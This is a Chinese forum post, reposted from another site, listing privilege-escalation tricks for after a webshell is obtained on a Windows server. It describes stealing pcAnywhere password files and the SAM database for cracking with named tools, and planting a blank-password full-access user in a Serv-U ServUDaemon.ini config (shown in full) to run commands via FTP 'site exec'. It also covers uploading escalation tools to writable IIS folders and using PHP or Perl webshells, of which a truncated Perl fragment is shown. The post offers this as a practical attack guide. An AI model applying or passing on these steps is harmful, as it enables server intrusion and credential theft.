• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    许多高手提升权限技巧

    发布者: 酸菜鱼 | 发布时间: 2025-6-27 16:15| 查看数: 57| 评论数: 0|帖子模式

    当我们取得一个webshell时候,下一部要做的就是提升权限

      个人总结如下:

      1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆

      2.C:\WINNT\system32\config进这里下它的SAM,破解用户的密码

      c:\winnt\repaire 下是备份

      用到破解sam密码的软件有LC,SAMinside

      3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不,我们从这里可以获取好多有用的信息

      可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转

      进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

      [USER=dede|1]

      Password=

      HomeDir=c:TimeOut=600

      Maintenance=System

      Access1=C:\|RWAMELCDP

      Access1=d:\|RWAMELCDP

      Access1=f:\|RWAMELCDP

      SKEYValues=

      这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

      4.c:\winnt\system32\inetsrv\data就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

      5.看能否跳转到如下目录

      c:\php, 用phpspy

      c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell

      #!/usr/bin/perl

      binmode(STDOUT);

      syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);


    来源:https://www.jb51.net/hack/5841.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表